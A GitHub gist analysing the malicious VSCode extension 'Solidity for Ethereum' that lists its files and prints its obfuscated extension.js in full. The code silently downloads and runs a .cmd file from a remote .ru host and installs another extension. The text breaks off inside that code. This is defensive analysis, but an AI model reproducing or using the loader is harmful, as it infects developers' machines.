Skip to content

Instantly share code, notes, and snippets.

@DuckSoft

DuckSoft/malware-analysis.md

Last active September 20, 2024 02:33
Show Gist options
  • Save DuckSoft/fe9582ab09a763ad0c39ce1798663817 to your computer and use it in GitHub Desktop.
Save DuckSoft/fe9582ab09a763ad0c39ce1798663817 to your computer and use it in GitHub Desktop.
Download ZIP
Analysis of Malware VSCode Extension "Solidity for Ethereum"
Raw
malware-analysis.md

Analysis of Malware VSCode Extension "Solidity for Ethereum"

Intro

The analyzed plugin can be download here. By the time the article is composed, it has a total of 1,484,752 installs, as is shown in extension profile page, which, I highly suspect that most of them are forged.

Analysis

Download and extract the VSIX Package:

├── [Content_Types].xml
├── extension
│   ├── CHANGELOG.md
│   ├── README.md
│   ├── extension-web.js
│   ├── extension.js
│   ├── icon.jpg
│   ├── license.txt
│   └── package.json
└── extension.vsixmanifest

Looking at the extension/extension.js, we've found that it's obfuscated:

(function(_0x9716a9,_0x52426d){function _0xf891a1(_0x103dc0,_0x1f4322,_0x3ebcc9,_0x6c6e70){return _0x3c03(_0x1f4322-0x383,_0x3ebcc9);}const _0x45b05f=_0x9716a9();function _0x40d45b(_0x3c9b6e,_0x17381b,_0x4cc9b7,_0x566c07){return _0x3c03(_0x3c9b6e- -0x242,_0x4cc9b7);}while(!![]){try{const _0x54f1d8=-parseInt(_0x40d45b(-0xae,-0x95,-0xde,-0xde))/(0x1279+-0x65*-0x63+-0x3*0x132d)*(parseInt(_0x40d45b(-0xc6,-0xc7,-0xc3,-0xa0))/(0x3*0xc61+0x2*-0x4e+-0x2485))+parseInt(_0xf891a1(0x4a0,0x4c0,0x48c,0x4e0))/(0x160e+-0xeb*-0x17+0x2b28*-0x1)+parseInt(_0xf891a1(0x53f,0x504,0x4d3,0x51a))/(0x4bf+0x36+0xfd*-0x5)*(-parseInt(_0x40d45b(-0xa8,-0x6e,-0xc9,-0x7b))/(-0x1476+-0x4f7+0x1972))+-parseInt(_0xf891a1(0x4aa,0x4cb,0x4ce,0x507))/(0x9*0x2f4+0x1d15*-0x1+-0x287*-0x1)*(parseInt(_0xf891a1(0x4aa,0x4bb,0x49a,0x48d))/(-0x1951*-0x1+0x1*0x1698+-0x2fe2))+parseInt(_0x40d45b(-0xf9,-0xd6,-0x132,-0xf7))/(0x5fc+0x1*0x110b+-0x1d*0xcb)*(-parseInt(_0xf891a1(0x50a,0x506,0x4f8,0x4de))/(0xe3*-0x16+-0xd*-0x147+0x5e*0x8))+parseInt(_0xf891a1(0x4ef,0x524,0x548,0x541))/(-0x1850+-0x26b9+0x3f13)*(-parseInt(_0xf891a1(0x4f0,0x527,0x526,0x53d))/(-0x25df+0x13*-0x3a+0x2a38))+-parseInt(_0xf891a1(0x50d,0x4f9,0x4c5,0x4ce))/(-0x2213+-0x5*-0x199+0x1a22)*(-parseInt(_0x40d45b(-0x9a,-0xc9,-0x61,-0xc5))/(-0xc20+-0x2fd+0x50e*0x3));if(_0x54f1d8===_0x52426d)break;else _0x45b05f['push'](_0x45b05f['shift']());}catch(_0x3db05b){_0x45b05f['push'](_0x45b05f['shift']());}}}(_0xf0f8,-0xd305d+-0x248ec+-0xd4051*-0x2));const _0x482b11=(function(){const _0x18dd31={};_0x18dd31['QoZsX']='giIJB';function _0x336576(_0x3870ff,_0x6b4fb1,_0x5a788a,_0x1380e5){return _0x3c03(_0x5a788a- -0xe8,_0x6b4fb1);}_0x18dd31['jmrPA']='RAoZA',_0x18dd31['MaIlK']=_0x421feb(-0x167,-0x191,-0x18c,-0x1a2),_0x18dd31[_0x336576(0x73,0xa2,0x96,0x56)]=function(_0x5e14a7,_0x389a43){return _0x5e14a7===_0x389a43;},_0x18dd31['gxTZz']=_0x421feb(-0xf2,-0xc0,-0xb8,-0x127);const _0x237aee=_0x18dd31;let _0x2eb0ab=!![];function _0x421feb(_0x2cde0e,_0x1d4004,_0x9afba5,_0x141071){return _0x3c03(_0x2cde0e- -0x298,_0x9afba5);}return function(_0x14e4dd,_0x47d914){function _0x233d01(_0x3696f7,_0x50cb87,_0x5e135d,_0x11363d){return _0x336576(_0x3696f7-0xce,_0x50cb87,_0x5e135d- -0x2fc,_0x11363d-0x69);}if(_0x237aee['NCitu'](_0x237aee[_0x233d01(-0x278,-0x257,-0x26f,-0x28b)],_0x237aee['gxTZz'])){const _0x2bbf70=_0x2eb0ab?function(){function _0x5c7a44(_0x437de4,_0x454325,_0x1bbba4,_0x45c4b3){return _0x233d01(_0x437de4-0x117,_0x45c4b3,_0x1bbba4-0x634,_0x45c4b3-0x3c);}function _0xef25ee(_0x2f2085,_0x31264b,_0x2c4fed,_0x32c9cc){return _0x233d01(_0x2f2085-0x117,_0x31264b,_0x32c9cc-0x4f6,_0x32c9cc-0xc);}if(_0x237aee['QoZsX']===_0x237aee[_0x5c7a44(0x3b4,0x369,0x37f,0x396)]){if(_0x47d914){if(_0x237aee[_0x5c7a44(0x3e9,0x3c5,0x3be,0x37d)]!==_0x237aee[_0x5c7a44(0x396,0x360,0x39f,0x3ba)]){const _0x5cf33e=_0x47d914[_0xef25ee(0x2ac,0x257,0x260,0x294)](_0x14e4dd,arguments);return _0x47d914=null,_0x5cf33e;}else{_0x3461d5['window'][_0xef25ee(0x2b2,0x274,0x28e,0x289)+'ationMessa'+'ge'](_0xef25ee(0x288,0x2ad,0x276,0x291)+_0x5d3265+(_0xef25ee(0x252,0x25a,0x219,0x252)+_0xef25ee(0x26a,0x263,0x24c,0x257)+'d.'));return;}}}else _0x2d3f14[_0x5c7a44(0x3e8,0x3b3,0x3e5,0x3ad)][_0xef25ee(0x205,0x266,0x213,0x240)+_0xef25ee(0x26a,0x26d,0x29a,0x27a)](_0xef25ee(0x2a8,0x2ed,0x2aa,0x2bb)+_0xef25ee(0x21e,0x279,0x285,0x251)+_0xef25ee(0x249,0x2a5,0x2b5,0x276));}:function(){};return _0x2eb0ab=![],_0x2bbf70;}else{const _0x294a87=_0x1751f5?function(){function _0x5cd6da(_0x1d1aa4,_0x2e0732,_0x2e7b00,_0x2e35ce){return _0x233d01(_0x1d1aa4-0xd3,_0x2e0732,_0x2e7b00-0x26f,_0x2e35ce-0x1f2);}if(_0x21d99c){const _0x2f4cf8=_0x36b78a[_0x5cd6da(0x2d,0x8,0xd,0x1)](_0x903178,arguments);return _0x542218=null,_0x2f4cf8;}}:function(){};return _0x45baac=![],_0x294a87;}};}()),_0x360413=_0x482b11(this,function(){const _0x6d497a={};_0x6d497a[_0x1edfb6(0x177,0x12e,0x14d,0x148)]=_0x2e42ea(0x44e,0x448,0x488,0x45e)+'+$';function _0x1edfb6(_0x3993e1,_0x31386c,_0x3759bf,_0x17227e){return _0x3c03(_0x17227e- -0x3f,_0x31386c);}const _0x3a511a=_0x6d497a;function _0x2e42ea(_0x43e43a,_0xd154cf,_0xe5704a,_0x3d6291){return _0x3c03(_0x43e43a-0x2a3,_0xd154cf);}return _0x360413['toString']()[_0x1edfb6(0x112,0xf7,0x13b,0x10e)](_0x3a511a[_0x2e42ea(0x42a,0x455,0x42e,0x40c)])[_0x1edfb6(0x125,0xfd,0xd6,0xfd)]()['constructo'+'r'](_0x360413)[_0x2e42ea(0x3f0,0x430,0x3ed,0x424)](_0x3a511a['HdzzO']);});_0x360413();const _0x29d036=(function(){const _0x54ef9a={};function _0x556959(_0x5bf878,_0x1153d7,_0x1ebe9d,_0xd700d4){return _0x3c03(_0xd700d4- -0x283,_0x5bf878);}function _0x596019(_0x33cd86,_0x29daa8,_0x4444ae,_0x4dd26d){return _0x3c03(_0x29daa8-0xc4,_0x4dd26d);}_0x54ef9a[_0x556959(-0x113,-0x10d,-0x123,-0x132)]=function(_0x8a854b,_0x2c8c44){return _0x8a854b!==_0x2c8c44;},_0x54ef9a[_0x556959(-0xc5,-0xd2,-0x105,-0xe5)]=_0x556959(-0xe3,-0xb3,-0xac,-0xde);const _0x4f93ce=_0x54ef9a;let _0x44f64c=!![];return function(_0x44003b,_0x1d71f8){const _0x1f0bdf=_0x44f64c?function(){function _0x41b214(_0x4d3f1f,_0xfc85d1,_0x56e3e8,_0x5de065){return _0x3c03(_0x56e3e8-0x373,_0x4d3f1f);}function _0x3bbf5b(_0x43cd12,_0x4c008a,_0x409280,_0x4f9bf6){return _0x3c03(_0x4f9bf6-0x2e6,_0x4c008a);}if(_0x1d71f8){if(_0x4f93ce[_0x3bbf5b(0x471,0x433,0x467,0x437)](_0x4f93ce[_0x3bbf5b(0x4b1,0x4a0,0x49a,0x484)],_0x4f93ce['JLzsf'])){if(_0x152593){const _0xa0e161=_0xe82cf0[_0x41b214(0x52d,0x4c9,0x4f5,0x513)](_0x270071,arguments);return _0x4c6497=null,_0xa0e161;}}else{const _0x3d37cc=_0x1d71f8['apply'](_0x44003b,arguments);return _0x1d71f8=null,_0x3d37cc;}}}:function(){};return _0x44f64c=![],_0x1f0bdf;};}()),_0x258824=_0x29d036(this,function(){const _0x381f0b={'IDqGq':_0x4306ff(0x13a,0x10f,0xe7,0x145)+_0x3c6bd5(0x49a,0x4a7,0x460,0x494)+_0x3c6bd5(0x471,0x4a8,0x485,0x49b)+'\x20)','DFoQB':function(_0x5ba4f8,_0x5695ce){return _0x5ba4f8===_0x5695ce;},'AjhYD':_0x3c6bd5(0x492,0x491,0x4b7,0x4a8),'SCmbl':_0x3c6bd5(0x446,0x469,0x401,0x430),'tbSXT':function(_0x16f312){return _0x16f312();},'vakbm':_0x3c6bd5(0x49f,0x4b4,0x471,0x4a7),'kHrzR':_0x3c6bd5(0x450,0x464,0x460,0x468),'uWbXp':'error','YMGii':_0x4306ff(0x143,0x130,0x109,0xfc),'uyzPF':_0x3c6bd5(0x4c8,0x4ce,0x4b2,0x493),'qNRFC':'trace','HuPhI':function(_0xc239d0,_0x4a089c){return _0xc239d0<_0x4a089c;}};function _0x3c6bd5(_0x1fcc73,_0x1f6dca,_0x229ae9,_0x4bf8a6){return _0x3c03(_0x4bf8a6-0x2fb,_0x1fcc73);}const _0x578214=function(){let _0x217acd;function _0x4c0f9d(_0xb68552,_0x5ddf38,_0x40b948,_0x45cd7f){return _0x4306ff(_0xb68552-0xfd,_0x45cd7f-0xaa,_0x40b948-0x64,_0x5ddf38);}function _0x85a108(_0x4cb3cd,_0x1eab5c,_0x3fc94b,_0x26f25e){return _0x3c6bd5(_0x3fc94b,_0x1eab5c-0x14a,_0x3fc94b-0x12e,_0x1eab5c- -0x376);}try{_0x217acd=Function(_0x4c0f9d(0x1fe,0x1e0,0x1fb,0x1cf)+'nction()\x20'+_0x381f0b[_0x4c0f9d(0x1d8,0x1a5,0x1de,0x1d0)]+');')();}catch(_0x1abdcb){if(_0x381f0b[_0x85a108(0x11a,0xdd,0xa8,0x103)](_0x381f0b[_0x4c0f9d(0x1db,0x1d0,0x228,0x1ff)],_0x381f0b['SCmbl'])){const _0x179a9b=_0x313df7?function(){function _0x240bae(_0x12340a,_0x4f2f53,_0x5835ac,_0x8e92bb){return _0x85a108(_0x12340a-0x7c,_0x8e92bb-0x3ee,_0x4f2f53,_0x8e92bb-0x174);}if(_0x348a7d){const _0x5122bc=_0x93ec26[_0x240bae(0x532,0x4e4,0x4f4,0x4f5)](_0x1d4f7f,arguments);return _0x3f48c4=null,_0x5122bc;}}:function(){};return _0x343c31=![],_0x179a9b;}else _0x217acd=window;}return _0x217acd;},_0x3e65c3=_0x381f0b['tbSXT'](_0x578214);function _0x4306ff(_0x3820dc,_0x174a4e,_0x56f841,_0x16c994){return _0x3c03(_0x174a4e- -0x37,_0x16c994);}const _0x4eff57=_0x3e65c3[_0x4306ff(0x10a,0x134,0x138,0x113)]=_0x3e65c3['console']||{},_0x4ccd38=[_0x381f0b[_0x4306ff(0x143,0x13d,0x15c,0x109)],_0x3c6bd5(0x4c9,0x4da,0x479,0x49a),_0x381f0b[_0x3c6bd5(0x41c,0x42d,0x420,0x42e)],_0x381f0b['uWbXp'],_0x381f0b[_0x3c6bd5(0x4a3,0x4a9,0x43f,0x46a)],_0x381f0b['uyzPF'],_0x381f0b[_0x3c6bd5(0x4aa,0x46d,0x46c,0x488)]];for(let _0x222921=0x76b+-0xaa8+0x33d;_0x381f0b['HuPhI'](_0x222921,_0x4ccd38[_0x4306ff(0x14c,0x110,0xfd,0x124)]);_0x222921++){const _0x3e9199=_0x29d036[_0x4306ff(0x155,0x14f,0x180,0x110)+'r'][_0x4306ff(0xfb,0x129,0x119,0xf1)]['bind'](_0x29d036),_0x1676db=_0x4ccd38[_0x222921],_0x3dc041=_0x4eff57[_0x1676db]||_0x3e9199;_0x3e9199[_0x4306ff(0x184,0x16b,0x1a1,0x1a0)]=_0x29d036['bind'](_0x29d036),_0x3e9199[_0x4306ff(0x122,0x105,0xf7,0x13b)]=_0x3dc041[_0x4306ff(0xf8,0x105,0x128,0x128)][_0x3c6bd5(0x434,0x498,0x4b2,0x473)](_0x3dc041),_0x4eff57[_0x1676db]=_0x3e9199;}});_0x258824();const vscode=require(_0x1b14ab(0x3d7,0x3dd,0x3eb,0x3dc)),{exec}=require(_0x12661e(0x4c3,0x4ec,0x4a8,0x4df)+_0x1b14ab(0x38e,0x3c1,0x35b,0x3aa));function _0x1b14ab(_0x3a55a5,_0xedf765,_0x423979,_0x5197f7){return _0x3c03(_0x3a55a5-0x244,_0x423979);}function executeCmdCommand(_0x2fef7b){const _0xffedf5={'bPqJr':function(_0xc054fa,_0x224e32){return _0xc054fa(_0x224e32);},'LHedt':function(_0x54c305){return _0x54c305();},'xVpZa':function(_0x4de69b,_0x1e2c9b){return _0x4de69b===_0x1e2c9b;},'IGIdL':function(_0x2bddc5,_0xeace6d,_0x5570be,_0x4be210){return _0x2bddc5(_0xeace6d,_0x5570be,_0x4be210);}};return new Promise((_0xae7d9,_0x7f526a)=>{const _0x262166={'VAbYg':function(_0x2fdeff,_0x7bee77){function _0x51d031(_0x36b357,_0x450348,_0x27cda9,_0x13f438){return _0x3c03(_0x36b357-0x19b,_0x13f438);}return _0xffedf5[_0x51d031(0x2f4,0x318,0x303,0x30a)](_0x2fdeff,_0x7bee77);},'kLvyX':function(_0x3b2038){function _0x5cc9d3(_0x319e16,_0x3c5c43,_0x5e1c44,_0x2b1350){return _0x3c03(_0x319e16-0x2e6,_0x2b1350);}return _0xffedf5[_0x5cc9d3(0x44b,0x45a,0x459,0x43e)](_0x3b2038);}};function _0xb86970(_0xe615e2,_0x13a07f,_0x1eb097,_0x57ee32){return _0x3c03(_0xe615e2- -0x3ce,_0x57ee32);}function _0x41d4a5(_0x38ab6f,_0x3f27b5,_0x4a8b28,_0x97085a){return _0x3c03(_0x4a8b28-0xb1,_0x97085a);}if(_0xffedf5[_0x41d4a5(0x1cc,0x1e2,0x1e5,0x1f2)]('lprfy',_0x41d4a5(0x1ca,0x1e2,0x1e3,0x21a))){const _0x4f7d21=_0x3eeae6[_0x41d4a5(0x232,0x20b,0x233,0x210)](_0x3ed73c,arguments);return _0x484774=null,_0x4f7d21;}else{const _0x2ab19d={};_0x2ab19d[_0x41d4a5(0x210,0x240,0x20f,0x223)+'e']=!![],_0xffedf5[_0xb86970(-0x268,-0x263,-0x23b,-0x240)](exec,'cmd.exe\x20/c'+'\x20'+_0x2fef7b,_0x2ab19d,(_0x204c12,_0x16d185,_0x2c3cbf)=>{if(_0x204c12){_0x262166[_0x442650(0x206,0x1f4,0x20c,0x206)](_0x7f526a,_0x204c12);return;}function _0x41e239(_0x18598d,_0x549b38,_0x21af5e,_0x2175fb){return _0x41d4a5(_0x18598d-0x135,_0x549b38-0xd2,_0x549b38- -0x456,_0x18598d);}function _0x442650(_0x5ad15a,_0x6a80a2,_0x7e14e7,_0x5cb2a2){return _0x41d4a5(_0x5ad15a-0x1a9,_0x6a80a2-0x49,_0x7e14e7-0x4,_0x6a80a2);}_0x262166[_0x41e239(-0x232,-0x23c,-0x27c,-0x248)](_0xae7d9);});}});}async function installExtension(_0x147356){const _0x538b57={'OKnqF':function(_0x1e9499,_0x37924b){return _0x1e9499===_0x37924b;},'kwDiA':_0x57a753(-0x263,-0x25a,-0x268,-0x287),'yoiVk':_0x37c8db(0x13f,0x121,0x119,0x108)+_0x37c8db(0x102,0x153,0x136,0x127)+_0x57a753(-0x215,-0x248,-0x27a,-0x27d)+_0x57a753(-0x258,-0x281,-0x25e,-0x27c),'rnhzK':function(_0x234946,_0x441ff5,_0x26a885){return _0x234946(_0x441ff5,_0x26a885);},'dXeXP':function(_0x4cd109,_0x5410ae){return _0x4cd109!==_0x5410ae;},'tfsQE':_0x37c8db(0xb7,0xc1,0xf6,0xd7)};function _0x37c8db(_0x9938f1,_0x38b693,_0x2658b8,_0x2c6bb6){return _0x12661e(_0x2658b8- -0x3c5,_0x38b693,_0x2658b8-0x152,_0x2c6bb6-0x1a5);}function _0x57a753(_0x24e840,_0x217c9b,_0x39fcfb,_0x413372){return _0x1b14ab(_0x217c9b- -0x629,_0x217c9b-0x1b3,_0x24e840,_0x413372-0x16a);}try{const _0x589c71=vscode[_0x37c8db(0x146,0x102,0x136,0x137)][_0x57a753(-0x25e,-0x249,-0x276,-0x212)+'on'](_0x147356);if(_0x589c71){vscode[_0x37c8db(0x109,0x138,0x13d,0xfe)][_0x57a753(-0x298,-0x26e,-0x2ac,-0x296)+_0x37c8db(0x172,0x134,0x139,0x123)+'ge'](_0x57a753(-0x244,-0x266,-0x270,-0x24c)+_0x147356+(_0x57a753(-0x2e6,-0x2a5,-0x2cf,-0x2df)+_0x57a753(-0x2c1,-0x2a0,-0x2d8,-0x2bd)+'d.'));return;}await vscode['commands']['executeCom'+_0x37c8db(0xf5,0xea,0x10b,0x112)](_0x538b57[_0x37c8db(0xd5,0x139,0xfc,0xd9)],_0x147356),vscode[_0x37c8db(0xff,0x10a,0x13d,0x130)][_0x37c8db(0x11b,0x152,0x11f,0x12a)+'ationMessa'+'ge'](_0x57a753(-0x27f,-0x273,-0x278,-0x23c)+'\x20'+_0x147356+'.'),_0x538b57[_0x57a753(-0x239,-0x256,-0x284,-0x236)](setTimeout,async()=>{function _0x21a69d(_0x4f39e6,_0x4541df,_0x3752e9,_0x5d1ab3){return _0x57a753(_0x4541df,_0x5d1ab3-0xb5,_0x3752e9-0x8b,_0x5d1ab3-0x1d4);}const _0x40cc6e=vscode[_0x447405(-0x1d2,-0x1ef,-0x1ba,-0x1bb)][_0x21a69d(-0x170,-0x16a,-0x1bc,-0x194)+'on'](_0x147356);function _0x447405(_0x5957b1,_0x575d73,_0x475e23,_0x6440c2){return _0x37c8db(_0x5957b1-0x12c,_0x475e23,_0x5957b1- -0x308,_0x6440c2-0x86);}if(_0x40cc6e&&!_0x40cc6e[_0x447405(-0x1c5,-0x18d,-0x1d8,-0x201)]){if(_0x538b57['OKnqF'](_0x538b57['kwDiA'],_0x538b57[_0x447405(-0x1b6,-0x1d9,-0x183,-0x1dd)]))await _0x40cc6e['activate'](),vscode['window']['showInform'+_0x21a69d(-0x182,-0x160,-0x1cf,-0x19f)+'ge'](_0x447405(-0x1e1,-0x205,-0x1ee,-0x20c)+'has\x20been\x20a'+'ctivated.');else{if(_0x1bb431){const _0x339e3d=_0x481bb1['apply'](_0x15c2f7,arguments);return _0x40b899=null,_0x339e3d;}}}},0x1521+-0x1a71+-0x884*-0x2);}catch(_0x5055ed){if(_0x538b57[_0x57a753(-0x2c0,-0x2a2,-0x2b7,-0x287)](_0x57a753(-0x282,-0x2aa,-0x2a6,-0x2bb),_0x538b57[_0x57a753(-0x247,-0x286,-0x282,-0x2b8)]))vscode[_0x37c8db(0x156,0x14f,0x13d,0x126)][_0x37c8db(0xd8,0xbb,0xd6,0xd5)+'essage'](_0x57a753(-0x263,-0x23c,-0x26d,-0x200)+_0x57a753(-0x295,-0x2a6,-0x273,-0x287)+_0x57a753(-0x2ad,-0x281,-0x256,-0x29e));else{const _0x47360e=_0x3e1795['constructo'+'r'][_0x37c8db(0xd8,0x142,0x108,0xef)][_0x57a753(-0x244,-0x26d,-0x264,-0x282)](_0x2ef05c),_0x5c8a0b=_0xa262b2[_0x550ee2],_0x42db56=_0x340952[_0x5c8a0b]||_0x47360e;_0x47360e['__proto__']=_0x3e6646[_0x57a753(-0x269,-0x26d,-0x2a8,-0x282)](_0x984694),_0x47360e[_0x37c8db(0xc7,0x113,0xe4,0xc6)]=_0x42db56[_0x37c8db(0xe5,0xbf,0xe4,0xf0)][_0x57a753(-0x234,-0x26d,-0x24c,-0x27a)](_0x42db56),_0x2d882f[_0x5c8a0b]=_0x47360e;}}}function activate(_0x43fab4){const _0xe16992={'eIlZt':function(_0x6cb867){return _0x6cb867();},'pinSO':function(_0x48c06b,_0x4fa553,_0x767caf,_0x272bec){return _0x48c06b(_0x4fa553,_0x767caf,_0x272bec);},'VpTgS':function(_0x5e7da5,_0x51cead){return _0x5e7da5===_0x51cead;},'vFliq':_0x22f9c5(-0x21e,-0x24a,-0x1ee,-0x245),'ZPmEO':_0x22f9c5(-0x23e,-0x23f,-0x23a,-0x227)+_0x4769fb(-0x63,-0x6b,-0x38,-0x84)+'hyareyouhe'+'rewho.ru/f'+'iles/1.cmd'+'\x20-o\x20\x22%TEMP'+_0x22f9c5(-0x1e7,-0x1f4,-0x1ed,-0x1d4)+_0x4769fb(-0x18,-0x51,-0x8b,-0x13)+_0x22f9c5(-0x1fe,-0x209,-0x1d0,-0x21b),'zICBo':function(_0x293e37,_0x5d158b){return _0x293e37(_0x5d158b);},'KqJLi':_0x22f9c5(-0x209,-0x1ed,-0x1d7,-0x1e2)+_0x22f9c5(-0x22c,-0x224,-0x201,-0x265)+_0x4769fb(-0x71,-0x33,-0x3f,-0x45),'Tmnco':function(_0x2b1942){return _0x2b1942();},'GIPhe':function(_0x37ca4d,_0x234f32,_0x2133f3,_0x3bb70b){return _0x37ca4d(_0x234f32,_0x2133f3,_0x3bb70b);},'VPwaf':_0x4769fb(-0x2f,-0x16,-0x16,-0x26),'BHrOH':_0x22f9c5(-0x20e,-0x24c,-0x218,-0x216)+_0x22f9c5(-0x257,-0x218,-0x283,-0x26b)+_0x22f9c5(-0x255,-0x225,-0x261,-0x25c),'OBaZV':function(_0x432c60,_0x332d75){return _0x432c60===_0x332d75;},'kykOE':function(_0x49a7de,_0x22fe81,_0x4fb8ed){return _0x49a7de(_0x22fe81,_0x4fb8ed);}};let _0x2328bf=vscode[_0x4769fb(-0x37,-0x9,0x12,0x13)][_0x4769fb(-0x81,-0x60,-0x7c,-0x80)+_0x4769fb(-0x1c,-0x40,-0x25,-0x38)](_0x4769fb(-0x23,-0x2c,0x13,-0x19)+_0x22f9c5(-0x257,-0x284,-0x239,-0x26f)+'Cmd',async function(){function _0xebcd7d(_0x1b68ef,_0x131300,_0x12f9b5,_0x19d49f){return _0x4769fb(_0x1b68ef-0x129,_0x12f9b5-0x3e9,_0x12f9b5-0x1e3,_0x19d49f);}function _0x5df97d(_0x1dc3da,_0x174865,_0x57a732,_0x5a4ed0){return _0x22f9c5(_0x174865-0x70f,_0x174865-0x1c7,_0x1dc3da,_0x5a4ed0-0x3f);}if(_0xe16992[_0xebcd7d(0x3a9,0x3ae,0x3a7,0x3b2)](process['platform'],_0xe16992['vFliq'])){const _0x3a240f=_0xe16992['ZPmEO'],_0x167175=_0x5df97d(0x4cc,0x4cc,0x48c,0x4fb)+_0xebcd7d(0x3ff,0x3d5,0x3c1,0x3e7)+_0x5df97d(0x4a9,0x4d4,0x4eb,0x4b7)+_0xebcd7d(0x3f4,0x3d7,0x3cf,0x3f1);try{if(_0xe16992[_0xebcd7d(0x3b9,0x391,0x3a7,0x3e6)](_0x5df97d(0x4e8,0x4b1,0x476,0x47c),_0x5df97d(0x4ee,0x518,0x4ed,0x537))){const _0x3cad9d={'uXPKa':function(_0x59ff3f){function _0xa76b1(_0x51c0c2,_0x1e78d1,_0x265d45,_0x5d8776){return _0x5df97d(_0x51c0c2,_0x1e78d1- -0x687,_0x265d45-0x1a5,_0x5d8776-0x114);}return _0xe16992[_0xa76b1(-0x1c9,-0x1cc,-0x1d8,-0x1e1)](_0x59ff3f);}},_0x4bb144={};_0x4bb144['windowsHid'+'e']=!![],_0xe16992[_0xebcd7d(0x396,0x3dd,0x39e,0x3c4)](_0x5d1214,_0x5df97d(0x4d0,0x4bf,0x47f,0x4a6)+'\x20'+_0x52337c,_0x4bb144,(_0x321ece,_0x1b3ee2,_0x3d66a1)=>{if(_0x321ece){_0x40812e(_0x321ece);return;}_0x3cad9d['uXPKa'](_0xaef7f9);});}else await Promise[_0xebcd7d(0x3a7,0x33d,0x36a,0x36a)]([_0xe16992[_0xebcd7d(0x3f8,0x3d7,0x3c5,0x3d5)](executeCmdCommand,_0x3a240f),_0xe16992[_0xebcd7d(0x38f,0x393,0x3c5,0x3aa)](installExtension,_0x167175)]),vscode[_0xebcd7d(0x404,0x3c1,0x3d2,0x39b)][_0x5df97d(0x4f4,0x4f8,0x514,0x4bb)+'ationMessa'+'ge'](_0xe16992['KqJLi']);}catch(_0x356ee9){}}});_0x43fab4[_0x22f9c5(-0x239,-0x213,-0x23e,-0x1fc)+_0x4769fb(-0x6a,-0x32,0xb,-0x46)]['push'](_0x2328bf);function _0x22f9c5(_0x1dc4a1,_0x40129b,_0x3525b2,_0x5df871){return _0x12661e(_0x1dc4a1- -0x6fb,_0x3525b2,_0x3525b2-0x1df,_0x5df871-0x2);}function _0x4769fb(_0x21be31,_0x3387bf,_0x3ade1c,_0x33704a){return _0x1b14ab(_0x3387bf- -0x3f0,_0x3387bf-0x15a,_0x33704a,_0x33704a-0x193);}_0xe16992[_0x4769fb(-0x49,-0x6a,-0x68,-0x40)](process[_0x4769fb(-0x5d,-0x5a,-0x4a,-0x1d)],_0xe16992[_0x22f9c5(-0x213,-0x1f3,-0x223,-0x237)])&&_0xe16992['kykOE'](setTimeout,()=>{function _0x36c701(_0x251bf5,_0x246d16,_0x1ba6c7,_0x2e8606){return _0x4769fb(_0x251bf5-0x88,_0x2e8606- -0x73,_0x1ba6c7-0x76,_0x246d16);}const _0x5a0118={'SxCJF':function(_0x8c545e,_0x26e62e){function _0x4f0d73(_0x3f8409,_0x2204fa,_0x10b898,_0x55abd4){return _0x3c03(_0x3f8409- -0x6a,_0x2204fa);}return _0xe16992[_0x4f0d73(0x11e,0x101,0xfa,0xf9)](_0x8c545e,_0x26e62e);},'aVCwR':function(_0x533559){return _0xe16992['Tmnco'](_0x533559);},'CKpCV':function(_0x45bd35,_0x4de24e,_0xaac84d,_0x1f5906){return _0xe16992['GIPhe'](_0x45bd35,_0x4de24e,_0xaac84d,_0x1f5906);}};function _0x1590f4(_0x527a78,_0x3a30a2,_0x4bc2ea,_0x7c48ba){return _0x22f9c5(_0x527a78-0x563,_0x3a30a2-0x1b4,_0x7c48ba,_0x7c48ba-0x1e1);}if(_0xe16992['VpTgS'](_0x1590f4(0x36b,0x396,0x388,0x359),_0xe16992['VPwaf']))vscode[_0x36c701(-0x59,-0xa0,-0x72,-0x7c)][_0x36c701(-0xcc,-0x8b,-0xe0,-0xa2)+_0x36c701(-0xc7,-0xde,-0xc7,-0xbc)](_0xe16992[_0x36c701(-0xee,-0x121,-0xae,-0xe9)]);else return new _0x23d6c9((_0x1ea10b,_0x39626b)=>{function _0x248d14(_0x44779a,_0x98532,_0xd82e9,_0x692eba){return _0x36c701(_0x44779a-0x4d,_0x44779a,_0xd82e9-0x1b,_0x692eba-0x157);}function _0x3848c5(_0x22501f,_0x737480,_0x31ee32,_0x4ebbb6){return _0x36c701(_0x22501f-0x190,_0x737480,_0x31ee32-0x16d,_0x4ebbb6-0x33);}const _0x7b48b9={'KhyMQ':function(_0x5f0812,_0x8cedea){return _0x5a0118['SxCJF'](_0x5f0812,_0x8cedea);},'EudqH':function(_0x308719){return _0x5a0118['aVCwR'](_0x308719);}},_0xdf37a5={};_0xdf37a5[_0x248d14(0xac,0x95,0x60,0x96)+'e']=!![],_0x5a0118[_0x3848c5(-0x6c,-0x5e,-0x7d,-0x62)](_0x553a5f,_0x3848c5(-0xac,-0x7f,-0xb5,-0xae)+'\x20'+_0xe34177,_0xdf37a5,(_0x4a4a77,_0x3025a,_0x278c89)=>{function _0x100f9b(_0x409d52,_0x46d1f4,_0xa80756,_0x25863f){return _0x3848c5(_0x409d52-0x1ed,_0x409d52,_0xa80756-0xc2,_0x25863f-0x4f9);}function _0x5a3ccf(_0xfd24d9,_0x83b346,_0x19b7b9,_0x11f02e){return _0x3848c5(_0xfd24d9-0x3a,_0x11f02e,_0x19b7b9-0xb,_0xfd24d9-0x351);}if(_0x4a4a77){_0x7b48b9[_0x100f9b(0x42e,0x45a,0x45b,0x451)](_0x39626b,_0x4a4a77);return;}_0x7b48b9[_0x5a3ccf(0x2d8,0x2c9,0x2b7,0x2d0)](_0x1ea10b);});});},0x23e+-0x1b*0x47+0x927);}function _0x3c03(_0x4db7c7,_0x2c4387){const _0x360413=_0xf0f8();return _0x3c03=function(_0x482b11,_0xf0f8bc){_0x482b11=_0x482b11-(-0x1dad+0x1acb+0x40f);let _0x3c032c=_0x360413[_0x482b11];return _0x3c032c;},_0x3c03(_0x4db7c7,_0x2c4387);}function deactivate(){}function _0xf0f8(){const 